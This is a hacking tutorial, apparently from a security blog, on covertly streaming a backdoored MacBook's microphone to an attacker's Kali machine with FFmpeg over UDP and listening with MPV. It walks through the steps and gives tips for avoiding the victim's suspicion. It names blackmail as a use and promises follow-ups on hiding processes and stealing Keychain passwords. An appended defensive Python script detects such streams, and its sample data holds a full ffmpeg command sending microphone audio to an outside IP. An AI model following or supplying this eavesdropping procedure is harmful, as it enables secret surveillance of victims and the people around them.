Google, Amazon, and Facebook are always listening. But what's worse? Hackers are listening, too. Windows PCs are particularly vulnerable, but with a few simple commands, a remote attacker can even take over the microphone on someone's Mac computer, streaming audio and listening to private conversations in real time without the victim's knowledge, abusing an overlooked security consideration.
After an attacker has established a backdoor on a vulnerable MacBook or compromised the device remotely using a fake PDF, they can use modern post-exploitation frameworks like Empire or Metasploit to execute a variety of different attacks. This time, I'll show a stealthier method of listening to audio using the victim's microphone by utilizing an application called FFmpeg.
How This Eavesdropping Attack Works
FFmpeg is a multimedia framework able to decode, encode, transcode, convert, stream, and play most formats on Windows, macOS, and Unix-based distributions.
This tool will be installed on both the backdoored MacBook and the attacker's Kali system. A listening server will be hosted on the attacker's side, and audio will be sent from the victim's MacBook to the attacker's system. The attacker will then be able to tap into the stream created by FFmpeg and hear everything in the surrounding area of the compromised MacBook.
Overheard information may include private conversations where a victim divulges a password or secret to someone in the room, personal information shared during phone calls, or conversations which can be later used for blackmail. This information is highly valuable to a remote attacker looking to further exploit the victim's personal and digital life, associates and family, and work colleagues.
Step 1: Install FFmpeg in Kali
On the attacker's Kali Linux system, FFmpeg can be installed using the apt-get install ffmpeg command, as seen below.
Step 2: Configure the FFmpeg Server
To receive an incoming audio stream, FFmpeg will need to be configured on the attacker's system. The below command can be used to start FFmpeg.
This command will instruct FFmpeg to open UDP port (udp://) 9999 and accept input (-i) on every available interface (0.0.0.0). It will then save the audio stream to the /tmp directory in MP3 format with the filename outputFile.mp3. The port number (9999), save directory (/tmp), and output filename can, of course, be changed as needed. For this demonstration, I'm using easy-to-remember values.
That's it for setting up FFmpeg on the attacker's system. Next, I'll show how to configure FFmpeg on the backdoored MacBook.
Step 3: Install FFmpeg on the Backdoored MacBook
FFmpeg is capable of capturing audio through Apple's AVFoundation, a fully featured framework for working with media on iOS, macOS, and watchOS. Using AVFoundation, users can play, create, and edit media files, as well as build powerful media functionality into applications.
From the Netcat backdoor on the MacBook, use cURL to download FFmpeg and save the ZIP to the /tmp directory. This can be done using the below command. To avoid arousing suspicion in the victim user, a directory other than /tmp can be used on the target MacBook.
When the download is complete, use the unzip /tmp/ffmpeg.zip command to extract the files, as seen below.
A new directory called 'ffmpeg-4.0-macos64-static/' will be created. In this directory is a bin/ directory containing the ffmpeg binary. Change into the bin/ directory using the cd command.
Ensure the ffmpeg binary has permission to execute on the MacBook using the chmod command.
Then, list the available input devices on the MacBook using the ./ffmpeg -f avfoundation -list_devices true -i "" command, as seen below.
This command will force (-f) FFmpeg to use the AVFoundation format and list (-list_devices) all available input (-i "") devices in the MacBook. AVFoundation uses the convention 'Video:Audio,' so capturing audio using the built-in microphone would appear as ':1' in the next command because the microphone is assigned to the '1' audio device.
To capture audio using the built-in microphone, run the below command from a Netcat shell on the backdoored MacBook.
Remember, the input source may appear as '0' or '2' on other MacBook devices. The force format (-f) is used again to specify the output format (MP3) and sends the audio stream to the attacker's UDP address on port 9999.
From the Netcat backdoor, the below output will continue to generate data pertaining to the data stream.
Back on the attacker's server, the FFmpeg terminal will display audio data and begin saving the audio to the specified (/tmp) directory.
As long as the FFmpeg terminals are running on both machines, the MacBook microphone will continue to send and save audio to the attacker's server.
Step 4: Install MPV & Listen to Streaming Audio
The final step is to tap into the audio stream. This can be done using MPV, a terminal-based application capable of playing audio from the command line. Use the apt-get install mpv command to install MPV in Kali.
Finally, use the mpv --keep-open=yes /tmp/outputFile.mp3 command to begin listening to the audio, as such:
The --keep-open argument isn't required. It will keep the MPV command from closing in the event it reaches the end of the file.
As mentioned, FFmpeg will continue to write audio data to outputFile.mp3. As MPV is playing audio in real time, it occasionally reaches the end of the file before FFmpeg can process the streaming audio. This is similar to how YouTube videos need to buffer before they can be played. MPV can't play audio if FFmpeg isn't done processing it. I would recommend leaving a 5–10-second buffer in the MPV terminal for a seamless (nearly real time) streaming experience.
How to Protect Against Audio Streaming Attacks
There's a good chance that antivirus software won't defend against such attacks, since FFmpeg isn't considered a malicious application and doesn't attempt to change any files on the computer or open ports.
Other than frequently checking for suspicious processes using top or ps, there's not a whole lot that can be done. In a future guide, I'll actually be showing how to hide such processes from active user detection, so those aren't surefire ways to detect abuse anyway.
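The ps check described above can be made more specific than scanning for a process name. The following is an added example, not part of the original article: a Python sketch that reads ps output and flags any process that records from an AVFoundation audio device while writing to a network URL. The sample ps lines are constructed, and the function names are hypothetical.

```python
# Added example: flag processes that capture AVFoundation audio and send it to a
# network URL. Matching is on arguments, not on the binary's name or path.
NETWORK_SCHEMES = ("udp://", "tcp://", "rtp://", "rtmp://", "http://", "https://")

# Constructed sample of `ps -axww -o pid=,user=,command=` output (not a real host).
SAMPLE_PS = """\
  312 alice /Applications/Safari.app/Contents/MacOS/Safari
  801 alice /tmp/ffmpeg-4.0-macos64-static/bin/ffmpeg -f avfoundation -i :1 -f mp3 udp://203.0.113.10:9999
  922 alice /usr/local/bin/ffmpeg -f avfoundation -i 1:0 /Users/alice/screencast.mkv
  950 alice ./ffmpeg -f avfoundation -list_devices true -i
  977 alice /usr/local/bin/ffmpeg -i talk.mov -f mpegts udp://203.0.113.10:9999
"""

def audio_device(device):
    """AVFoundation inputs are 'Video:Audio'; return the audio part or None."""
    audio = device.partition(":")[2]
    return audio if audio and audio.lower() != "none" else None

def find_mic_streams(ps_text):
    """Return one finding per process that streams microphone audio off the host."""
    findings = []
    for line in ps_text.splitlines():
        parts = line.split(None, 2)
        if len(parts) < 3 or not parts[0].isdigit():
            continue  # header, blank, or malformed line
        argv = parts[2].split()
        pairs = list(zip(argv, argv[1:]))
        if not any(a == "-f" and b.lower() == "avfoundation" for a, b in pairs):
            continue  # not capturing through AVFoundation
        inputs = [b for a, b in pairs if a == "-i"]
        mic = audio_device(inputs[0]) if inputs else None
        dests = [a for a in argv
                 if a.lower().startswith(NETWORK_SCHEMES) and a not in inputs]
        if mic is not None and dests:
            findings.append({"pid": int(parts[0]), "user": parts[1],
                             "audio_device": mic, "destinations": dests})
    return findings

if __name__ == "__main__":
    for hit in find_mic_streams(SAMPLE_PS):
        print("pid %(pid)d (%(user)s): audio device %(audio_device)s -> %(destinations)s" % hit)
```

On a live Mac, pass the function the text produced by `ps -axww -o pid=,user=,command=`; local recordings and file-to-network transcodes, like the second and last ffmpeg lines in the sample, are not flagged.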
A last-ditch way to protect yourself against eavesdroppers is to just disconnect the cable for the built-in microphone in the MacBook, iMac, or other Mac computer, then rely solely on third-party desktop microphones or headphones with built-in mics that you can easily disconnect when not in use. This will at least limit your exposure to possible eavesdropping attacks.
Stay Tuned for More macOS Hacks
That's it for streaming audio from a backdoored MacBook using FFmpeg and MPV. In upcoming articles, I'll show how to dump Keychain passwords, capture keystrokes, hack iCloud passwords, and utilize many of the Empire and Metasploit post-exploitation modules to further hack macOS devices.